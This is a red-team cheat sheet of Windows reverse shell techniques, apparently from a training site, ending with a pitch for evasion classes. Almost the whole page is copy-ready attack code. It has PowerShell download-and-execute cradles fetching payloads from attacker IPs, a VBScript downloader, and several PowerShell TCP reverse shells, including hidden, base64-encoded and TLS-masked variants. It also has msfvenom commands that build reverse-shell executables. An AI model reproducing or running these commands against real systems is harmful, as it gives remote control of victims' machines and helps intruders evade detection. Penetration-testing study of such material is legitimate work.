Windows Reverse Shells
Power of Powershell on Windows
Download Reverse Shells on the target machine:
Download and execute the script
Copy powershell.exe - c iex( new-object system.net.webclient).downloadstring( 'http://10.10.10.10/powerrev.ps1' /
Copy powershell.exe iex( invoke-webrequest ( "http://10.10.10.10:8001/powerrev.ps1" ) - UseBasicParsing))
powershell.exe iex(iwr(http: // 10.10 . 10.10 : 8001 / powerrev.ps1) - usebasicparsing)
Download the rev shell on the target and save it
Copy powershell.exe Invoke-WebRequest http: // 10.10 . 10.10 / powerrev.ps1 - OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1
Multiple ways to download and execute the shell on the victim system
Copy iex ( New-Object Net.Webclient).DownloadString( 'https://webserver/payload.ps1' )
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.56.102:8002/shell.ps1');sleep 2;$response=$ie.Document.body.innerHTML;$ie.quit();$wshell = New-Object -ComObject wscript.shell;$wshell.AppActivate($OpenWindow.MainWindowTitle);Start-Sleep -Seconds 3;$wshell.SendKeys("{ENTER}");iex $response; iex $wshell
Copy iex (iwr 'http://192.168.230.1/evil.ps1' )
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET', 'http://192.168.56.102:8002/shell.ps1',$false);$h.send();iex $h.responseText
$wr = [ System.NET.WebRequest ]::Create( "http://192.168.56.102:8002/shell.ps1" )
$r = $wr.GetResponse()
IEX([ System.IO.StreamReader ]($r.GetResponseStream())).ReadToEnd()
Copy echo strUrl = WScript.Arguments.Item( 0 ) > wget.vbs
echo StrFile = WScript.Arguments.Item( 1 ) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http , varByteArray , strData , strBuffer , lngCounter , fs , ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject( "WinHttp.WinHttpRequest" ) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject( "MSXML2.ServerXMLHTTP" ) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject( "Microsoft.XMLHTTP" ) >> wget.vbs
echo http.Open "GET" , strURL , False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject( "Scripting.FileSystemObject" ) >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile , True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr( 255 And Ascb(Midb(varByteArray , lngCounter + 1 , 1 ))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Some more powershell shells:
Copy $LHOST = "10.10.10.10"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
Copy powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.1.1',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Copy powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
Base64 encode with nc -lvvnp 9001
Copy powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
Copy $sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
Windows Stageless reverse TCP
Copy msfvenom -p windows/shell_reverse_tcp LHOST= 10.1.1.1 LPORT= 4244 -f exe > reverse.exe
Windows Staged reverse TCP
Copy msfvenom -p windows/meterpreter/reverse_tcp LHOST= 10.0.0.1 LPORT= 4242 -f exe > reverse.exe
Note on Modern Security Protections and Advanced Tactics
While the reverse shell techniques outlined above are powerful tools in a red teamer’s arsenal, it’s important to note that modern security systems such as Endpoint Detection and Response (EDR) solutions have become adept at detecting and mitigating such activities. These protections are designed to analyze system behaviors and network traffic to block the known signatures and anomalous patterns associated with reverse shells.
However, advanced techniques do exist to bypass these protections, which often involve sophisticated methods such as memory injection, obfuscation, and the use of legitimate administrative tools to mimic normal user activities. These advanced methods are not only about evading detection but also about understanding and manipulating the underlying systems and security mechanisms.
To learn more about these advanced evasion techniques and to gain hands-on experience in deploying reverse shells while circumventing modern security defenses, we encourage participation in our live red team classes (sessions). These sessions are designed to provide deep insights into the latest red teaming tactics and real-world applications, enabling participants to stay ahead in the ever-evolving landscape of cybersecurity threats and defenses. Join us to transform your theoretical knowledge into practical expertise and master the art of invisible intrusion.
Last updated 4 months ago